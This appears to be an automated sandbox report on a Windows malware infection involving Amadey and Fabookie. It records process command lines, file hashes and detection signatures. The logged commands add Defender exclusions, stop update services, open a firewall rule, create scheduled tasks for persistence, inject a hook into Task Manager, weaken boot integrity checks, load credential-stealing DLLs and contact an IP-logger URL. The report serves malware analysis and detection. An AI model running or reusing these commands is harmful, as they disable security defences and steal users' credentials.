taskkill /im "Ti7BaeU3IDoi3JgxcuwS4XBO.exe" /f

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231005034152.log C:\Windows\Logs\CBS\CbsPersist_20231005034152.cab

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\Pictures\h15Hs6ewA8wDxuAPG7SwUvHx.exe

"C:\Users\Admin\Pictures\h15Hs6ewA8wDxuAPG7SwUvHx.exe"

C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe

"C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {F1260FFC-C553-4B39-9F8B-E1C549273F12} S-1-5-21-3185155662-718608226-894467740-1000:YETUIZPU\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\74-e4a16-c1c-d499b-a0b8c979f3235\Cutunufihi.exe

"C:\Users\Admin\AppData\Local\Temp\74-e4a16-c1c-d499b-a0b8c979f3235\Cutunufihi.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 388

C:\Program Files\Google\DTIYPLMWZT\lightcleaner.exe

"C:\Program Files\Google\DTIYPLMWZT\lightcleaner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-11HUT.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-11HUT.tmp\lightcleaner.tmp" /SL5="$501B6,833775,56832,C:\Program Files\Google\DTIYPLMWZT\lightcleaner.exe" /VERYSILENT

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start https://iplogger.com/1ciGA4

C:\Windows\syswow64\rundll32.exe

"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\8259092891.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.com/1ciGA4

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1464 CREDAT:275457 /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\vabgtjshkifw.xml"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

Network

Country Destination Domain Proto

Files

SHA256 4f4c96457f0f44adcdbba07302ebaadb29d728ab9afc6c1605a54b7fe806c069
SHA512 8fea72232ec6e165dcd004399241ebfb93587fc5081b5f483e943520762b43c8572cd3dbe7a0990b22bbc38eb3be1a46aece1d627677f373b732910d339091ef

C:\Users\Admin\Pictures\VRnBPi60IQwBk18YAVL23Tpl.exe

MD5 bb4d6d8d6784ae4027bf456a4da94a54
SHA1 1c16e598906a1a90e88370a8d6fdcacc3e3b48fc
SHA256 bd8dad5cc34e4f61c5f9616843888d1b351efbed57209c9c010fffd9a643c294
SHA512 c6cae52ecb21c613bad881414556ac1a6dc5293ff92ddb57aba8e0a5fb3251c2791f68c4dcc31a7ef631ee823a39ae29fda7ca0f764242bc4a2dade77b46c4f6

\Users\Admin\AppData\Local\Temp\8259092891.exe

MD5 a7d77fc1a1794b646deb45ae5530b4e0
SHA1 49f6b846739d81a687f4378b4194f6e21c114f88
SHA256 888af4c53350a2be69181d573583ce047e1b49bc9bfb4b2d8cf4b870a0e68535
SHA512 78ae752ce74d544f02b1122e504992ca54072a1f6104f130be8888dacc94617b48283a54e1a969a2dc54743414d6a369bd4fa33c04487267663d7f8d9736c84a

\Users\Admin\AppData\Local\Temp\8259092891.exe

MD5 a7d77fc1a1794b646deb45ae5530b4e0
SHA1 49f6b846739d81a687f4378b4194f6e21c114f88
SHA256 888af4c53350a2be69181d573583ce047e1b49bc9bfb4b2d8cf4b870a0e68535
SHA512 78ae752ce74d544f02b1122e504992ca54072a1f6104f130be8888dacc94617b48283a54e1a969a2dc54743414d6a369bd4fa33c04487267663d7f8d9736c84a

C:\Users\Admin\AppData\Local\Temp\8259092891.exe

MD5 a7d77fc1a1794b646deb45ae5530b4e0
SHA1 49f6b846739d81a687f4378b4194f6e21c114f88
SHA256 888af4c53350a2be69181d573583ce047e1b49bc9bfb4b2d8cf4b870a0e68535
SHA512 78ae752ce74d544f02b1122e504992ca54072a1f6104f130be8888dacc94617b48283a54e1a969a2dc54743414d6a369bd4fa33c04487267663d7f8d9736c84a

C:\Users\Admin\AppData\Local\Temp\8259092891.exe

MD5 a7d77fc1a1794b646deb45ae5530b4e0
SHA1 49f6b846739d81a687f4378b4194f6e21c114f88
SHA256 888af4c53350a2be69181d573583ce047e1b49bc9bfb4b2d8cf4b870a0e68535
SHA512 78ae752ce74d544f02b1122e504992ca54072a1f6104f130be8888dacc94617b48283a54e1a969a2dc54743414d6a369bd4fa33c04487267663d7f8d9736c84a

memory/2836-552-0x0000000002460000-0x00000000028C4000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ace55b49ec996833bb5940b02f5eccf0
SHA1 f54d888066e22d3b2d85e34224e8a3c391e385d6
SHA256 bdd5e533be7fd04d1e84883c8f026121f10e98c16edd7ad93853a006dffd8582
SHA512 f59c9f0f07344cca15665cbc67d2ecae7e78e7ca5df01ab6bd6b18599360483940ca33de8004e6ec9c2eb46d20d1479a45fc9f17c63cbdf31f88d1ae9733d79d

memory/2240-561-0x0000000000400000-0x00000000005B9000-memory.dmp

memory/1496-562-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/2204-573-0x0000000005CB0000-0x0000000005CF0000-memory.dmp

memory/2240-574-0x0000000000400000-0x00000000005B9000-memory.dmp

C:\Users\Admin\Pictures\Ti7BaeU3IDoi3JgxcuwS4XBO.exe

MD5 964bdba979c484e55a908c90d2730e16
SHA1 9127a71953cf9d16c860d4a64da7f8039a88586e
SHA256 d82c45f69039c845e06a293aa727223bc715ecdeb5fe1df0a7e3a7d30b1a818b
SHA512 f9c0c5ab8df012ca24cf53414c014f974702ccc3ad3eeadd1863c24a643fd566b918737ce7de3072d4112ff037f6c484004c05d9a0713ed1c3c98ac0ca2d0550

memory/2872-576-0x000000013F290000-0x000000013F7D3000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c7551bd98e1a3fe4055d23014ba2ba3f
SHA1 df875b7b49fe7160b1e75c5d7952fa4fd90a4824
SHA256 9ba26aa23de874f85aa4277f4f60be0e7f95a074f6ec600a66e4194c26a2d725
SHA512 ce5f94c9d8209c0801848b8bfbd061b6719c6ef084d928839be80cf47b2a09179804f21a6644dc9907cba88036e2553618cc327279c3701ee76cc330e045047b

memory/3056-585-0x000000001B1E0000-0x000000001B260000-memory.dmp

memory/2992-597-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/2836-602-0x0000000000400000-0x0000000000A00000-memory.dmp

memory/2836-606-0x0000000000400000-0x0000000000A00000-memory.dmp

memory/1496-608-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/1972-615-0x0000000002570000-0x0000000002968000-memory.dmp

C:\Users\Admin\Pictures\h15Hs6ewA8wDxuAPG7SwUvHx.exe

MD5 9fd5293f6df01bd8e9daaf7820589b78
SHA1 be58cf67fc310d8b8fe706a6dccdffa52aeb1e35
SHA256 4f4c96457f0f44adcdbba07302ebaadb29d728ab9afc6c1605a54b7fe806c069
SHA512 8fea72232ec6e165dcd004399241ebfb93587fc5081b5f483e943520762b43c8572cd3dbe7a0990b22bbc38eb3be1a46aece1d627677f373b732910d339091ef

memory/880-617-0x0000000002830000-0x0000000002C28000-memory.dmp

memory/2992-616-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/1496-619-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/2872-620-0x000000013F290000-0x000000013F7D3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-R4Q61.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7f838d774f48fc34a293888d7c86ee79
SHA1 cbdde821a826ff62398ed5517a0f8712e080fbe8
SHA256 ba9b7864aa83aef2d1e1c5691953584d4aecef042496a6b8eac2c91a80b4b853
SHA512 0d32c69e78d0955bda226cf0c4ebc3f35564a0dda184e46c4b89c14f27fc60d26cd80015a254ae0fc54198a91121b5a56a621868a9be07f775c8db86881cae24

memory/2836-719-0x0000000000400000-0x0000000000A00000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f92f466cffbd7010181d504917afb3be
SHA1 32de05343e20274d356e7a79bd1df3d8da70565f
SHA256 ae739e7dd089255fa320ddef2d40449452877c58631799e2741011909d9250c0
SHA512 010e1f2120b7eb07dc6a93ef6372ab9680bc40247477d092abd0314e1ca7ca72a7ee777bd341fdc18b3354c04dc1eb30f45678d8d02f552c8e289aa2f0ed5eb7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 32478da8fd25969571b2e93fba84ef5f
SHA1 7307d3d8b9b6ca34244a367daa23d572c483edc6
SHA256 ffabbb1d7dfde15c1a47fd80d25e858d2e9695134ce3a73bb43fec9862ea78c9
SHA512 a78886d74a49841ac02f83dc9e8f82c31393adbf3c163facafbc1238f6ff0ca0ba0c81ef8f6e576e6ba215af2b58905a1fb83e2a3954f21ad7b6556a20267d3f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

memory/2836-766-0x0000000003760000-0x0000000003F52000-memory.dmp

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9e6d22d9fda8277fe48c53a7eb95570a
SHA1 830c396a64ccc1844f5dabcc421d16a284b9256b
SHA256 38dae8dae8bdc6197f2fd87435363371cc89e6fdd91b8428e3e48df4c07c7667
SHA512 3300c77dcfd22e12a7f5a8e64cb7d9986adb235108a438e51d47d9120da027fce0adaa2f5090152accb679656b22cda674a69f32b39530d7c1f36676a4995607

C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll

MD5 49b3faf5b84f179885b1520ffa3ef3da
SHA1 c1ac12aeca413ec45a4f09aa66f0721b4f80413e
SHA256 b89189d3fca0a41aee9d4582a8efbe820d49e87224c325b4a0f4806d96bf86a5
SHA512 018d531b3328267ecaebcb9f523c386c8aa36bf29e7b2e0f61bd96a0f7f2d03c7f25f878c373fbce7e44c8d5512e969b816ed9c72edb44afa302670c652de742

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 a060b33d6df657ee708fc71cb4580f39
SHA1 e19d5e7c9ec665a1fc0caaa84174ed15bd2c280d
SHA256 8c76d1785caafbd41c8aefd8a4e6f1a64c79e99da6dfaa83bf89ba6722f9647c
SHA512 e24b3f1c44026d777fe50d3e7fccafecc0225cd1ed6cdbf6752e82ff0772efd2da842c2b2b7cc0b2ebea90cea0158cb5e065cdbaf71024e29ad8f514637d0328

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

MD5 e4a68ac854ac5242460afd72481b2a44
SHA1 df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256 cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA512 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fdaed8f502e92e4ce9b86b142c711437
SHA1 067cbda9309f36c996e5fbf8a71fca21af4f1baa
SHA256 ef0fbea894369ae0bab6bf648731533716882ea0017919fffe3a027e6939aef5
SHA512 2b6b375ca6f3cbeb982952ad3594e5bdde3f7782f791a487b87258cd2167a7ae7a434cfed5820cc20ec0111d12a6ed6d5e97ebcc90e71b79066e95b57686d5b0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 01f5483dd961531c9b03479dfd7eb20f
SHA1 d756daaa4749b3dcc5752cff2b63ac6d411daa5b
SHA256 b46cd2da2df4cfcf0ad4140340597166610018c4fe53c1e638efaae325235086
SHA512 ac19f2e5c40b0947b884b5e635f21d37837c371e8a5cf47d7c071712cdc88e5830d5b36378edb18a3542ff89af8a047a7cba527238a87c27fe7e070b1b2eed28

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c50a8734c9b49f10f1e9e47838c8d866
SHA1 ac0b5155a5b09800bc9eee99ca9d92fb6e389c95
SHA256 4dd3510dd962449cf384b189372eaa4a1f8e720a1a417a1f982a585bbba9aac5
SHA512 8fbdd87b0a13aeeb5a3bf5989ae2d1673f0e655e309bcac03555d7efc71c037f0ed6182f4f5b5584824b8d94122e65246170db5f8fc203a6dc56ad6941c328af

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5136cb97354b28d3667b7d8a877a8eff
SHA1 97e48a9851620d854b46740f33d701fa35b5e179
SHA256 4593be45ed9f7a52511faeadb1d5ea4f0f671e85f90b3255fb99cad373098f61
SHA512 83551004beb42ed5e14246969d302ee0a0c7b70d4300b973ba32ba264896653996f126864699ad36bfc61ff4fbd4ace75a5c77e1bbb74cdec9eff7680406cc9e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 08a871e15e56499b113d19a3f0cfd576
SHA1 3a40d368e005212340c80e2cb73837754c70a099
SHA256 1f52efad1bb28cd715a47b5bf6b0bc44cc3eb39fc33d670df0b328839475f9ff
SHA512 b7224eadbcce1f5f957ff4a37fffdbcff949d2a07bf7188f410b43adda69c0017af424e30330f544a80f6862f566154068ef3c16d6b497815ffe91613547fb74

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b173db70deedee084b71613eaf896010
SHA1 3d4a36faf6059b4376a36c07629349dcc8b86b6e
SHA256 3a41dfba832c91cde4652e7b2b74713e91749286bfa05a0ae53dfc2d21c419bf
SHA512 543f5ca7946d91a4150e6893469ce4e3126ed0a30ae66d758fef396d71770cd0c2fe57797d0e21fb77be5957f88064d3734715c1ab9f9d4987dcd13cb4c3c1d5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 616b61f92e83cbb219abc4e886f04722
SHA1 4f07fa56516294419b535460660a919e94552694
SHA256 8c0aea994dbf3f9546d1f484d0c3d642d706458b6c5f0b5072d2327bab1bf599
SHA512 649a089c7a6b8c00325fe6bdf51d85f3ea335e2d28f949cf53bd834f05c950f7290cb4a2f65b8b043cdaca0aae355397952dc98e718ea1c0eea29c071d5e4eaf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2555cecf96aa0099bb29bf177cf285c5
SHA1 5d02ff0fbe4b0968eb1c3da270d53b83e3202314
SHA256 27b65198ec02e702fea027c6fb154e240f88b0e7aa4458fe408bc411ffabe616
SHA512 1a3c284a220904334a1f7d61f1658c1b345625c376c4514cfeacdb1dbf0c662c9ace8422d3873f96b89574aaa4dcdb53ae2fb78c25feaa289f75f8baa89d66f2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 5f5c04e57e50dd331a5640cf46a92126
SHA1 9bf0346b46a097ce8afbf1bc96d13c1bb94458ff
SHA256 fca6037c1136018d23839d104a7400239e95c1b8d259216b8bc8b6df51ff4d29
SHA512 380ad8693fc040821aa71c7ae5488d5ec50f924238c9dd10d2995b343897bb44e2b2bb0e2d89e41ac9f12ae144221d268a53cb721ec2a7e51826c76237800d99

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Temp\Kno63E1.tmp

MD5 002d5646771d31d1e7c57990cc020150
SHA1 a28ec731f9106c252f313cca349a68ef94ee3de9
SHA256 1e2e25bf730ff20c89d57aa38f7f34be7690820e8279b20127d0014dd27b743f
SHA512 689e90e7d83eef054a168b98ba2b8d05ab6ff8564e199d4089215ad3fe33440908e687aa9ad7d94468f9f57a4cc19842d53a9cd2f17758bdadf0503df63629c6

C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

MD5 da597791be3b6e732f0bc8b20e38ee62
SHA1 1125c45d285c360542027d7554a5c442288974de
SHA256 5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07
SHA512 d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\O3E62B0W\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-05 03:40

Reported

2023-10-05 03:46

Platform

win10-20230915-en

Max time kernel

89s

Max time network

307s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\rundll32.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
